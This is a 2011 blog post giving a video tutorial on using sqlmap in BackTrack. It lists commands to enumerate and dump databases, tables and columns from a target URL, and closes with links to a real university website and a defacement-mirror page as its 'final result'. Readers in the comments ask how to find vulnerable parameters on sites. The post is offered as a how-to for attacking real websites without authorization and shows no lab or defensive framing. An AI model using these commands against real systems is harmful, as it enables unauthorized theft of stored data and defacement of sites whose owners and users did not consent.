Sunday, December 4, 2011

||Video Tut on using sqlmap on backtrack||


Hey guys in this video you all will learn how to use sqlmap in backtrack



Syntax used in the ViDEO
For scanning url
./sqlmap.py -u[url]

For getting Database
./sqlmap.py -u[url] --dbs

For Getting tables
./sqlmap.py -u [url] --tables -D [database]

For getting Column
./sqlmap.py -u [url] --columns -T [table name] -D [databasename]

for Dumping whole column.
./sqlmap.py -u [url] --dump --columns -T [table name] -D [databasename]

For specific column dump
./sqlmap.py -u [url] --dump -C [column name] -T [table name] -D [database name]

FINAL RESULT
http://www.khyber.edu.pk/ 
http://www.arab-zone.net/mirror/43343/khyber.edu.pk/


5 comments:

  1. Well, Its easier to learn this way. Your way of devloping and explaining the things is different.. and i like it that way..

    Thanks for sharing your knowledge.

    R@hul

    ReplyDelete
  2. hello sir tell me how to find out of error id=? of any vunlerable website

    ReplyDelete
  3. hello tell me how to find out the error id

    like http://www.khyber.edu.pk/pages.php?id=????????/ this

    ReplyDelete
    Replies
    1. REad This http://www.hackerzadda.com/2010/10/website-hacking-using-sql-injection.html

      Delete